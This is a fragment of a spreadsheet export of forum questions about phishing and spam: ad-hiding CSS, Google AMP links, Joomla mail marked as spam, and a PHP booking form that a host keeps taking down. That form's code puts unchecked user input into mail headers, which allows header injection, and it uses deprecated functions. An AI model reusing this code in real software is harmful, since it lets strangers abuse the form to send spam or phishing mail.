 #ad-circfooter, #ad-code, #ad-col, #ad-colB-1, #ad-column, #ad-container-1, #ad-container-2, #ad-container-adaptive-1, #ad-container-adaptive-3, #ad-container-fullpage, #ad-container-inner, #ad-container-leaderboard, #ad-container-mpu, #ad-container-outer, #ad-container-overlay, #ad-container1, #ad-contentad, #ad-cube-Bottom, #ad-cube-Middle, #ad-cube-sec, #ad-cube-top, #ad-desktop-wrap, #ad-discover, #ad-display-ad, #ad-div-leaderboard, #ad-double-spotlight-container, #ad-drawer, #ad-e-container, #ad-ear, #ad-extra-comments, #ad-extra-flat, #ad-f-container, #ad-featured-right, #ad-first-post, #ad-five, #ad-five-75x50s, #ad-flex-first, #ad-flex-top, #ad-footer, #ad-footer-728x90, #ad-footprint-160x600, #ad-for-map, #ad-frame, #ad-framework-top, #ad-front-btf, #ad-front-footer, #ad-front-page-160x600-placeholder, #ad-front-sponsoredlinks, #ad-full-width, #ad-fullbanner-btf { display: none!important; }
 #ad-fullbanner-outer, #ad-fullbanner2, #ad-fullbanner2-billboard-outer, #ad-fullwidth, #ad-giftext, #ad-globalleaderboard, #ad-google-chrome-sidebar, #ad-googleAdSense, #ad-gpt-bottomrightrec, #ad-gpt-leftrec, #ad-gpt-rightrec, #ad-gutter-left, #ad-gutter-right, #ad-halfpage, #ad-header-left, #ad-header-mad, #ad-header-mobile, #ad-header-right, #ad-holder, #ad-homepage-content-well, #ad-homepage-top-wrapper, #ad-horizontal, #ad-horizontal-header, #ad-horizontal-top, #ad-idreammedia, #ad-img, #ad-in-post, #ad-index, #ad-inner, #ad-inside1, #ad-inside2, #ad-interstitial-wrapper, #ad-introtext, #ad-label, #ad-label2, #ad-large-header, #ad-lb, #ad-lb-secondary, #ad-ldr-spot, #ad-lead, #ad-leader, #ad-leader-atf, #ad-leader-container, #ad-leaderboard-1, #ad-leaderboard-1-container, #ad-leaderboard-2, #ad-leaderboard-2-container, #ad-leaderboard-bottom, #ad-leaderboard-container, #ad-leaderboard-footer { display: none!important; }
 #ad-leaderboard-spot, #ad-leaderboard-top, #ad-leaderboard-top-container, #ad-leaderboard_bottom, #ad-leadertop, #ad-left, #ad-left-sidebar-ad-1, #ad-left-sidebar-ad-2, #ad-left-sidebar-ad-3, #ad-left-timeswidget, #ad-links-content, #ad-list-row, #ad-lrec, #ad-main-bottom, #ad-main-top, #ad-makeup, #ad-manager, #ad-manager-ad-bottom-0, #ad-manager-ad-top-0, #ad-medium, #ad-medium-lower, #ad-medium-rectangle, #ad-medrec, #ad-medrec_premium, #ad-megaban2, #ad-megasky, #ad-mid, #ad-mid-rect, #ad-middle, #ad-middlethree, #ad-middletwo, #ad-midpage, #ad-minibar, #ad-module, #ad-mpu, #ad-mpu-topRight-container, #ad-mpu-warning, #ad-mpu1-spot, #ad-mpu2, #ad-mpu2-spot, #ad-mpu600-right-container, #ad-mrec, #ad-mrec2, #ad-new, #ad-news-sidebar-300x250-placeholder, #ad-north, #ad-north-base, #ad-northeast, #ad-one, #ad-other { display: none!important; }
 #ad-output, #ad-overlay, #ad-page-1, #ad-page-sky-300-a1, #ad-page-sky-300-a2, #ad-page-sky-left, #ad-pan3l, #ad-pencil, #ad-placard, #ad-placeholder, #ad-placement, #ad-plate, #ad-popup, #ad-popup1, #ad-position-a, #ad-post, #ad-push, #ad-pushdown, #ad-r, #ad-rbkua, #ad-rec-atf, #ad-rec-btf-top, #ad-recommend, #ad-rect, #ad-rectangle, #ad-rectangle-flag, #ad-rectangle1, #ad-rectangle1-outer, #ad-rectangle2, #ad-rectangle3, #ad-region-1, #ad-results, #ad-rian, #ad-right-3, #ad-right-container, #ad-right-sidebar, #ad-right-sidebar-ad-1, #ad-right-sidebar-ad-2, #ad-right-skyscraper-container, #ad-right-top, #ad-right2, #ad-right3, #ad-righttop, #ad-ros-atf-300x90, #ad-ros-btf-300x90, #ad-row, #ad-row-1, #ad-s1, #ad-safe, #ad-secondary-sidebar-1 { display: none!important; }
 #ad-section, #ad-separator, #ad-shop, #ad-side, #ad-side-text, #ad-sidebar, #ad-sidebar-1, #ad-sidebar-2, #ad-sidebar-3, #ad-sidebar-300x80, #ad-sidebar-btf, #ad-sidebar-container, #ad-sidebar-mad, #ad-sidebar-mad-wrapper, #ad-sidebar-right_300-1, #ad-sidebar-right_300-2, #ad-sidebar-right_300-3, #ad-sidebar-right_bitgold, #ad-sidebar1, #ad-sidebar2, #ad-sidebarleft-bottom, #ad-sidebarleft-top, #ad-single-spotlight-container, #ad-skin, #ad-sky, #ad-sky-atf, #ad-sky-btf, #ad-skyscraper, #ad-skyscraper-feedback, #ad-skyscraper1-outer, #ad-sla-sidebar300x250, #ad-slot-1, #ad-slot-2, #ad-slot-4, #ad-slot-right, #ad-slot1, #ad-slot4, #ad-slug-wrapper, #ad-small-banner, #ad-smartboard_1, #ad-smartboard_2, #ad-smartboard_3, #ad-software-description-300x250-placeholder, #ad-software-sidebar-300x250-placeholder, #ad-space, #ad-space-1, #ad-space-2, #ad-space-big, #ad-special, #ad-splash { display: none!important; }
 #ad-sponsored-traffic, #ad-sponsors, #ad-spot, #ad-spot-bottom, #ad-spot-one, #ad-springboard-300x250, #ad-squares, #ad-standard-wrap, #ad-stickers, #ad-story-bottom-in, #ad-story-bottom-out, #ad-story-right, #ad-story-top, #ad-stripe, #ad-tab, #ad-tail-placeholder, #ad-tape, #ad-target, #ad-target-Leaderbord, #ad-teaser, #ad-techwords, #ad-textad-single, #ad-three, #ad-tlr-spot, #ad-top-250, #ad-top-300x250, #ad-top-728, #ad-top-banner, #ad-top-leaderboard, #ad-top-left, #ad-top-lock, #ad-top-right, #ad-top-right-container, #ad-top-text-low, #ad-top-wrap, #ad-tower, #ad-tower1, #ad-trailerboard-spot, #ad-tray, #ad-two, #ad-typ1, #ad-uprrail1, #ad-video, #ad-video-page, #ad-west, #ad-wide-leaderboard, #ad-wrap, #ad-wrap-right, #ad-wrapper-728x90, #ad-wrapper-left { display: none!important; }
 #ad-wrapper-right, #ad-wrapper1, #ad-yahoo-simple, #ad-zone-1, #ad-zone-2, #ad-zone-inline, #ad001, #ad002, #ad01, #ad02, #ad1-468x400, #ad1-home, #ad1-placeholder, #ad1-wrapper, #ad1006, #ad101, #ad10Sp, #ad11, #ad11Sp, #ad120x600, #ad120x600container, #ad120x60_override, #ad125B, #ad125BL, #ad125BR, #ad125TL, #ad125TR, #ad125x125, #ad160, #ad160-2, #ad160600, #ad160Container, #ad160Wrapper, #ad160a, #ad160x600, #ad160x600right, #ad180, #ad1Sp, #ad1_holder, #ad1_top-left, #ad2-home, #ad2-label, #ad2-original-placeholder, #ad250, #ad260x60, #ad2CONT, #ad2Sp, #ad2_footer, #ad2_iframe, #ad2_inline { display: none!important; }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;this is just part of it. In total there are 3500 lines of this type including some Ad links and so on.&lt;/p&gt;
 &lt;p&gt;I want to get rid of it but I cannot. because of it it recognizes the email as a phishing scam.&lt;/p&gt;
 &lt;p&gt;I cannot remove it. Everytime i remove it and save the html it comes again. Has someone run into this problem before.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;html&gt;&lt;css&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>How to disable AMP caching from Google Search?</t>
  </si>
  <si>
    <t>&lt;p&gt;Some results on Google Search comes with AMP (Accelerated Mobile Pages) icon on theirs links, at least when using a mobile, as soon you click on the link instead of loading the site, google show you a cached version of it rather.&lt;/p&gt;
 &lt;p&gt;I want to disable this behaviour on my results, I see at least two good reasons for it:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;&lt;p&gt;When sharing the link it is a pain in the neck to have the huge google URL in place of the shorter one would be just with the original one.&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Security: when you access any site and see a URL other than the site you wanted to load, you should distrust it, even if it looks like google (remember, you can get phished or even get caught in a trap hosted on gsites), Google should respect that instead of encouraging users to trust it just because the url looks like google! Even worst if combined with the first reason and you want to share the URL with a friend.&lt;/p&gt;&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;I have to remove the google AMP prefix ever and ever, there is no advanced search option or cookie that makes Google give the clean URL?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;caching&gt;&lt;google-search&gt;&lt;amp-html&gt;</t>
  </si>
  <si>
    <t>Emails sent through joomla go to SPAM folder</t>
  </si>
  <si>
    <t>&lt;p&gt;I am using the latest Joomla build for my website.
 Allso we use a DNS record for having the mail delivered to our own server instead of the server on which the website is hosted.&lt;/p&gt;
 &lt;p&gt;I have used several contact form components, but every sent mail goes to my SPAM folder.
 After searching hours on the web (and getting linked to this site frequently) i decided to make a new post.&lt;/p&gt;
 &lt;p&gt;It does not matter if i use the standard joomla forms, or any component.&lt;/p&gt;
 &lt;p&gt;Whenever a user fills in a form on my website, the email gets sent. The user receives a copy of its message, and i receive the message of the user. However, this message gets thrown in the spam folder, as phishing.&lt;/p&gt;
 &lt;p&gt;The sender of the mail always is: &lt;em&gt;username@nameserver.i3d.net; namens; websitename &lt;/em&gt;&lt;/p&gt;
 &lt;p&gt;What do i have to change/enable/disable for this to work?&lt;/p&gt;
 &lt;p&gt;Thanks in advance.&lt;/p&gt;
 &lt;p&gt;Patrick.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;header&gt;&lt;spam&gt;</t>
  </si>
  <si>
    <t>Phishing attack through PHP form</t>
  </si>
  <si>
    <t>&lt;p&gt;I am having trouble with two forms on a website. The pages hosting the forms have been taken down several times by my host due to 'phishing attacks'.&lt;/p&gt;
 &lt;p&gt;The forms on the pages where constructed using 'PHPFormGenerator' which is software provided by the hosting company (iPage).&lt;/p&gt;
 &lt;p&gt;I have made sure I am usign the latest version of 'PHPFormGenerator' as recomended, but again the pages where taken down. I installed a 'Captcha' on the forms but again the pages have been taken down.&lt;/p&gt;
 &lt;p&gt;I have currently removed the forms from the pages and replaced them with email links.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Code on Booking form page:&lt;/strong&gt;&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; &amp;lt;div class="formRow"&amp;gt;
  &amp;lt;div class="formLeft"&amp;gt;Name&amp;lt;span class="red"&amp;gt;*&amp;lt;/span&amp;gt;&amp;lt;/div&amp;gt;
  &amp;lt;div class="formRight"&amp;gt;
  &amp;lt;input type=text name='Name' size=40&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div class="formRow"&amp;gt;
  &amp;lt;div class="formLeft"&amp;gt;Telephone&amp;lt;span class="red"&amp;gt;*&amp;lt;/span&amp;gt;&amp;lt;/div&amp;gt;
  &amp;lt;div class="formRight"&amp;gt;
  &amp;lt;input type=text name='Telephone' size=40&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div class="formRow"&amp;gt;
  &amp;lt;div class="formLeft"&amp;gt;Email&amp;lt;span class="red"&amp;gt;*&amp;lt;/span&amp;gt;&amp;lt;/div&amp;gt;
  &amp;lt;div class="formRight"&amp;gt;
  &amp;lt;input type=text name='Email' size=40&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div class="formRow"&amp;gt;
  &amp;lt;div class="formLeft"&amp;gt;Address1&amp;lt;span class="red"&amp;gt;*&amp;lt;/span&amp;gt;&amp;lt;/div&amp;gt;
  &amp;lt;div class="formRight"&amp;gt;
  &amp;lt;input type=text name='Address1' size=40&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div class="formRow"&amp;gt;
  &amp;lt;div class="formLeft"&amp;gt;Address2&amp;lt;span class="red"&amp;gt;*&amp;lt;/span&amp;gt;&amp;lt;/div&amp;gt;
  &amp;lt;div class="formRight"&amp;gt;
  &amp;lt;input type=text name='Address2' size=40&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div class="formRow"&amp;gt;
  &amp;lt;div class="formLeft"&amp;gt;Address3&amp;lt;/div&amp;gt;
  &amp;lt;div class="formRight"&amp;gt;
  &amp;lt;input type=text name='Address3' size=40&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div class="formRow"&amp;gt;
  &amp;lt;div class="formLeft"&amp;gt;Address4&amp;lt;/div&amp;gt;
  &amp;lt;div class="formRight"&amp;gt;
  &amp;lt;input type=text name='Address4' size=40&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div class="formRow"&amp;gt;
  &amp;lt;div class="formLeft"&amp;gt;Zip / Post code&amp;lt;span class="red"&amp;gt;*&amp;lt;/span&amp;gt;&amp;lt;/div&amp;gt;
  &amp;lt;div class="formRight"&amp;gt;
  &amp;lt;input type=text name='PostCode' size=40&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div class="formRow"&amp;gt;
  &amp;lt;div class="formLeft"&amp;gt;Arrival&amp;lt;span class="red"&amp;gt;*&amp;lt;/span&amp;gt;&amp;lt;/div&amp;gt;
  &amp;lt;div class="formRight"&amp;gt;
  &amp;lt;input type=text name='Arrival' size=15 id="datepicker"&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div class="formRow"&amp;gt;
  &amp;lt;div class="formLeft"&amp;gt;Departure&amp;lt;span class="red"&amp;gt;*&amp;lt;/span&amp;gt;&amp;lt;/div&amp;gt;
  &amp;lt;div class="formRight"&amp;gt;
  &amp;lt;input type=text name='Departure' size=15 id="datepicker2"&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div class="formRow"&amp;gt;
  &amp;lt;div class="formLeft"&amp;gt;GroupNumber&amp;lt;span class="red"&amp;gt;*&amp;lt;/span&amp;gt;&amp;lt;/div&amp;gt;
  &amp;lt;div class="formRight"&amp;gt;
  &amp;lt;select name='GroupNumber'&amp;gt;
  &amp;lt;option value='01'&amp;gt;01&amp;lt;/option&amp;gt;
  &amp;lt;option value='02'&amp;gt;02&amp;lt;/option&amp;gt;
  &amp;lt;option value='03'&amp;gt;03&amp;lt;/option&amp;gt;
  &amp;lt;option value='04'&amp;gt;04&amp;lt;/option&amp;gt;
  &amp;lt;option value='05'&amp;gt;05&amp;lt;/option&amp;gt;
  &amp;lt;option value='06'&amp;gt;06&amp;lt;/option&amp;gt;
  &amp;lt;/select&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div class="formRow"&amp;gt;
  &amp;lt;div class="formLeft"&amp;gt;Reason&amp;lt;/div&amp;gt;
  &amp;lt;div class="formRight"&amp;gt;
  &amp;lt;select name='Reason'&amp;gt;
  &amp;lt;option value='Vacation'&amp;gt;Vacation&amp;lt;/option&amp;gt;
  &amp;lt;option value='Business'&amp;gt;Business&amp;lt;/option&amp;gt;
  &amp;lt;option value='Education'&amp;gt;Education&amp;lt;/option&amp;gt;
  &amp;lt;option value='Other'&amp;gt;Other&amp;lt;/option&amp;gt;
  &amp;lt;/select&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div class="formRow"&amp;gt;
  &amp;lt;div class="formLeft"&amp;gt;Transfer&amp;lt;/div&amp;gt;
  &amp;lt;div class="formRight"&amp;gt;
  &amp;lt;input type=checkbox name='Transfer'&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div class="formRow"&amp;gt;
  &amp;lt;div class="formLeft"&amp;gt;CarRental&amp;lt;/div&amp;gt;
  &amp;lt;div class="formRight"&amp;gt;
  &amp;lt;input type=checkbox name='CarRental'&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div class="formRow"&amp;gt;
  &amp;lt;div class="formLeft"&amp;gt;Taxi&amp;lt;/div&amp;gt;
  &amp;lt;div class="formRight"&amp;gt;
  &amp;lt;input type=checkbox name='Taxi'&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div class="formRow"&amp;gt;
  &amp;lt;div class="formLeft"&amp;gt;Additional&amp;lt;/div&amp;gt;
  &amp;lt;div class="formRightBox"&amp;gt;
  &amp;lt;textarea name='Additional' rows=7 cols=31&amp;gt;&amp;lt;/textarea&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div class="formRow"&amp;gt;
  &amp;lt;div class="formLeft"&amp;gt; &amp;lt;/div&amp;gt;
  &amp;lt;div class="formRightCaptcha"&amp;gt;
  &amp;lt;?php
  require_once('recaptchalib.php');
  $publickey = "6LfgGOASAAAAAOQ-oVZNlo8HmxR4GadyY4h5c0hY"; // you got this from the signup page
  echo recaptcha_get_html($publickey);
  ?&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div class="formRow"&amp;gt;
  &amp;lt;div class="formLeft"&amp;gt; &amp;lt;/div&amp;gt;
  &amp;lt;div class="formRight"&amp;gt;
  &amp;lt;input type=submit value='Submit Form'&amp;gt;
  &amp;amp;nbsp;
  &amp;lt;input type=reset value='Reset Form'&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;&lt;strong&gt;Verify.php&lt;/strong&gt;&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; &amp;lt;?php
  require_once('recaptchalib.php');
  $privatekey = "***PRIVATEKEYREMOVED***";
  $resp = recaptcha_check_answer ($privatekey,
  $_SERVER["REMOTE_ADDR"],
  $_POST["recaptcha_challenge_field"],
  $_POST["recaptcha_response_field"]);
  if (!$resp-&amp;gt;is_valid) {
  // What happens when the CAPTCHA was entered incorrectly
  die ("The reCAPTCHA wasn't entered correctly. Go back and try it again." .
  "(reCAPTCHA said: " . $resp-&amp;gt;error . ")");
  } else {
  // Your code here to handle a successful verification
  include("global.inc.php");
 $errors=0;
 $error="The following errors occured while processing your form input.&amp;lt;ul&amp;gt;";
 pt_register('POST','Name');
 pt_register('POST','Telephone');
 pt_register('POST','Email');
 pt_register('POST','Address1');
 pt_register('POST','Address2');
 pt_register('POST','Address3');
 pt_register('POST','Address4');
 pt_register('POST','PostCode');
 pt_register('POST','Arrival');
 pt_register('POST','Departure');
 pt_register('POST','GroupNumber');
 pt_register('POST','Reason');
 pt_register('POST','Transfer');
 pt_register('POST','CarRental');
 pt_register('POST','Taxi');
 pt_register('POST','Additional');
 $Additional=preg_replace("/(\015\012)|(\015)|(\012)/","&amp;amp;nbsp;&amp;lt;br /&amp;gt;", $Additional);if($Name=="" || $Telephone=="" || $Email=="" || $Address1=="" || $Address2=="" || $PostCode=="" || $Arrival=="" || $Departure=="" || $GroupNumber=="" ){
 $errors=1;
 $error.="&amp;lt;li&amp;gt;You did not enter one or more of the required fields. Please go back and try again.";
 }
 if(!eregi("^[a-z0-9]+([_\\.-][a-z0-9]+)*" ."@"."([a-z0-9]+([\.-][a-z0-9]+)*)+"."\\.[a-z]{2,}"."$",$Email)){
 $error.="&amp;lt;li&amp;gt;Invalid email address entered";
 $errors=1;
 }
 if($errors==1) echo $error;
 else{
 $where_form_is="http".($HTTP_SERVER_VARS["HTTPS"]=="on"?"s":"")."://".$SERVER_NAME.strrev(strstr(strrev($PHP_SELF),"/"));
 $message="A booking enquiry has been made by ".$Name."
 Telephone: ".$Telephone."
 Email: ".$Email."
 Address1: ".$Address1."
 Address2: ".$Address2."
 Address3: ".$Address3."
 Address4: ".$Address4."
 PostCode: ".$PostCode."
 Arrival: ".$Arrival."
 Departure: ".$Departure."
 GroupNumber: ".$GroupNumber."
 Reason: ".$Reason."
 Transfer: ".$Transfer."
 CarRental: ".$CarRental."
 Taxi: ".$Taxi."
 Additional: ".$Additional."
 ";
 $message = stripslashes($message);
 $subject = 'Louis Villa booking enquiry';
 $headers = 'From:' .$Name. ' made a booking enquiry' . "\r\n" . // &amp;lt;- change your email here
  'Reply-To:' . $Email . "\r\n";
 mail("info@louisvilla.com",$subject,$message,$headers);
 header("Location:http://louisvilla.com/thankyou.html");
 exit();
 }
  }
 ?&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;&lt;strong&gt;Global.inc.php&lt;/strong&gt;&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;?php
 function pt_register()
 {
  $num_args = func_num_args();
  $vars = array();
  if ($num_args &amp;gt;= 2) {
  $method = strtoupper(func_get_arg(0));
  if (($method != 'SESSION') &amp;amp;&amp;amp; ($method != 'GET') &amp;amp;&amp;amp; ($method != 'POST') &amp;amp;&amp;amp; ($method != 'SERVER') &amp;amp;&amp;amp; ($method != 'COOKIE') &amp;amp;&amp;amp; ($method != 'ENV')) {
  die('The first argument of pt_register must be one of the following: GET, POST, SESSION, SERVER, COOKIE, or ENV');
  }
  $varname = "HTTP_{$method}_VARS";
  global ${$varname};
  for ($i = 1; $i &amp;lt; $num_args; $i++) {
  $parameter = func_get_arg($i);
  if (isset(${$varname}[$parameter])) {
  global $$parameter;
  $$parameter = ${$varname}[$parameter];
  }
  }
  } else {
  die('You must specify at least two arguments');
  }
 }
 ?&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;&lt;strong&gt;recaptchalib.php&lt;/strong&gt;&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;?php
 define("RECAPTCHA_API_SERVER", "http://www.google.com/recaptcha/api");
 define("RECAPTCHA_API_SECURE_SERVER", "https://www.google.com/recaptcha/api");
 define("RECAPTCHA_VERIFY_SERVER", "www.google.com");
 /**
  * Encodes the given data into a query string format
  * @param $data - array of string elements to be encoded
  * @return string - encoded request
  */
 function _recaptcha_qsencode ($data) {
  $req = "";
  foreach ( $data as $key =&amp;gt; $value )
  $req .= $key . '=' . urlencode( stripslashes($value) ) . '&amp;amp;';
  // Cut the last '&amp;amp;'
  $req=substr($req,0,strlen($req)-1);
  return $req;
 }
 /**
  * Submits an HTTP POST to a reCAPTCHA server
  * @param string $host
  * @param string $path
  * @param array $data
  * @param int port
  * @return array response
  */
 function _recaptcha_http_post($host, $path, $data, $port = 80) {
  $req = _recaptcha_qsencode ($data);
  $http_request = "POST $path HTTP/1.0\r\n";
  $http_request .= "Host: $host\r\n";
  $http_request .= "Content-Type: application/x-www-form-urlencoded;\r\n";
  $http_request .= "Content-Length: " . strlen($req) . "\r\n";
  $http_request .= "User-Agent: reCAPTCHA/PHP\r\n";
  $http_request .= "\r\n";
  $http_request .= $req;
  $response = '';
  if( false == ( $fs = @fsockopen($host, $port, $errno, $errstr, 10) ) ) {
  die ('Could not open socket');
  }
  fwrite($fs, $http_request);
  while ( !feof($fs) )
  $response .= fgets($fs, 1160); // One TCP-IP packet
  fclose($fs);
  $response = explode("\r\n\r\n", $response, 2);
  return $response;
 }
 /**
  * Gets the challenge HTML (javascript and non-javascript version).
  * This is called from the browser, and the resulting reCAPTCHA HTML widget
  * is embedded within the HTML form it was called from.
  * @param string $pubkey A public key for reCAPTCHA
  * @param string $error The error given by reCAPTCHA (optional, default is null)
  * @param boolean $use_ssl Should the request be made over ssl? (optional, default is false)
  * @return string - The HTML to be embedded in the user's form.
  */
 function recaptcha_get_html ($pubkey, $error = null, $use_ssl = false)
 {
  if ($pubkey == null || $pubkey == '') {
  die ("To use reCAPTCHA you must get an API key from &amp;lt;a href='https://www.google.com/recaptcha/admin/create'&amp;gt;https://www.google.com/recaptcha/admin/create&amp;lt;/a&amp;gt;");
  }
  if ($use_ssl) {
  $server = RECAPTCHA_API_SECURE_SERVER;
  } else {
  $server = RECAPTCHA_API_SERVER;
  }
  $errorpart = "";
  if ($error) {
  $errorpart = "&amp;amp;amp;error=" . $error;
  }
  return '&amp;lt;script type="text/javascript" src="'. $server . '/challenge?k=' . $pubkey . $errorpart . '"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;noscript&amp;gt;
  &amp;lt;iframe src="'. $server . '/noscript?k=' . $pubkey . $errorpart . '" height="300" width="500" frameborder="0"&amp;gt;&amp;lt;/iframe&amp;gt;&amp;lt;br/&amp;gt;
  &amp;lt;textarea name="recaptcha_challenge_field" rows="3" cols="40"&amp;gt;&amp;lt;/textarea&amp;gt;
  &amp;lt;input type="hidden" name="recaptcha_response_field" value="manual_challenge"/&amp;gt;
  &amp;lt;/noscript&amp;gt;';
 }
 /**
  * A ReCaptchaResponse is returned from recaptcha_check_answer()
  */
 class ReCaptchaResponse {
  var $is_valid;
  var $error;
 }
 /**
  * Calls an HTTP POST function to verify if the user's guess was correct
  * @param string $privkey
  * @param string $remoteip
  * @param string $challenge
  * @param string $response
  * @param array $extra_params an array of extra variables to post to the server
  * @return ReCaptchaResponse
  */
 function recaptcha_check_answer ($privkey, $remoteip, $challenge, $response, $extra_params = array())
 {
  if ($privkey == null || $privkey == '') {
  die ("To use reCAPTCHA you must get an API key from &amp;lt;a href='https://www.google.com/recaptcha/admin/create'&amp;gt;https://www.google.com/recaptcha/admin/create&amp;lt;/a&amp;gt;");
  }
  if ($remoteip == null || $remoteip == '') {
  die ("For security reasons, you must pass the remote ip to reCAPTCHA");
  }
  //discard spam submissions
  if ($challenge == null || strlen($challenge) == 0 || $response == null || strlen($response) == 0) {
  $recaptcha_response = new ReCaptchaResponse();
  $recaptcha_response-&amp;gt;is_valid = false;
  $recaptcha_response-&amp;gt;error = 'incorrect-captcha-sol';
  return $recaptcha_response;
  }
  $response = _recaptcha_http_post (RECAPTCHA_VERIFY_SERVER, "/recaptcha/api/verify",
  array (
  'privatekey' =&amp;gt; $privkey,
  'remoteip' =&amp;gt; $remoteip,
  'challenge' =&amp;gt; $challenge,
  'response' =&amp;gt; $response
  ) + $extra_params
  );
  $answers = explode ("\n", $response [1]);
  $recaptcha_response = new ReCaptchaResponse();
  if (trim ($answers [0]) == 'true') {
  $recaptcha_response-&amp;gt;is_valid = true;
  }
  else {
  $recaptcha_response-&amp;gt;is_valid = false;
  $recaptcha_response-&amp;gt;error = $answers [1];
  }
  return $recaptcha_response;
 }
 /**
  * gets a URL where the user can sign up for reCAPTCHA. If your application
  * has a configuration page where you enter a key, you should provide a link
  * using this function.
  * @param string $domain The domain where the page is hosted
  * @param string $appname The name of your application
  */
 function recaptcha_get_signup_url ($domain = null, $appname = null) {
  return "https://www.google.com/recaptcha/admin/create?" . _recaptcha_qsencode (array ('domains' =&amp;gt; $domain, 'app' =&amp;gt; $appname));
 }
 function _recaptcha_aes_pad($val) {
  $block_size = 16;
  $numpad = $block_size - (strlen ($val) % $block_size);
  return str_pad($val, strlen ($val) + $numpad, chr($numpad));
 }
 /* Mailhide related code */
 function _recaptcha_aes_encrypt($val,$ky) {
  if (! function_exists ("mcrypt_encrypt")) {
  die ("To use reCAPTCHA Mailhide, you need to have the mcrypt php module installed.");
  }
  $mode=MCRYPT_MODE_CBC; 
  $enc=MCRYPT_RIJNDAEL_128;
  $val=_recaptcha_aes_pad($val);
  return mcrypt_encrypt($enc, $ky, $val, $mode, "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0");
 }
 function _recaptcha_mailhide_urlbase64 ($x) {
  return strtr(base64_encode ($x), '+/', '-_');
 }
 /* gets the reCAPTCHA Mailhide url for a given email, public key and private key */
 function recaptcha_mailhide_url($pubkey, $privkey, $email) {
  if ($pubkey == '' || $pubkey == null || $privkey == "" || $privkey == null) {
  die ("To use reCAPTCHA Mailhide, you have to sign up for a public and private key, " .
  "you can do so at &amp;lt;a href='http://www.google.com/recaptcha/mailhide/apikey'&amp;gt;http://www.google.com/recaptcha/mailhide/apikey&amp;lt;/a&amp;gt;");
  }
  $ky = pack('H*', $privkey);
  $cryptmail = _recaptcha_aes_encrypt ($email, $ky);
  return "http://www.google.com/recaptcha/mailhide/d?k=" . $pubkey . "&amp;amp;c=" . _recaptcha_mailhide_urlbase64 ($cryptmail);
 }
 /**
  * gets the parts of the email to expose to the user.
  * eg, given johndoe@example,com return ["john", "example.com"].
  * the email is then displayed as john...@example.com
  */
 function _recaptcha_mailhide_email_parts ($email) {
  $arr = preg_split("/@/", $email );
  if (strlen ($arr[0]) &amp;lt;= 4) {
  $arr[0] = substr ($arr[0], 0, 1);
  } else if (strlen ($arr[0]) &amp;lt;= 6) {
  $arr[0] = substr ($arr[0], 0, 3);
  } else {
  $arr[0] = substr ($arr[0], 0, 4);
  }
  return $arr;
 }
 /**
  * Gets html to display an email address given a public an private key.
  * to get a key, go to:
  *
  * http://www.google.com/recaptcha/mailhide/apikey
  */
 function recaptcha_mailhide_html($pubkey, $privkey, $email) {
  $emailparts = _recaptcha_mailhide_email_parts ($email);
  $url = recaptcha_mailhide_url ($pubkey, $privkey, $email);
  return htmlentities($emailparts[0]) . "&amp;lt;a href='" . htmlentities ($url) .
  "' onclick=\"window.open('" . htmlentities ($url) . "', '', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=300'); return false;\" title=\"Reveal this e-mail address\"&amp;gt;...&amp;lt;/a&amp;gt;@" . htmlentities ($emailparts [1]);
 }
 ?&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Any help would be appreciated. I have been in touch with my hosting company asking for support as the form is built with software they recommend, the only help they offered was to go to an online forum and ask for help.&lt;/p&gt;
 &lt;p&gt;I have created many 'contact forms' etc before and never had this problem.&lt;/p&gt;
 &lt;p&gt;Thanks in advance for any help.&lt;/p&gt;</t>
  </si>
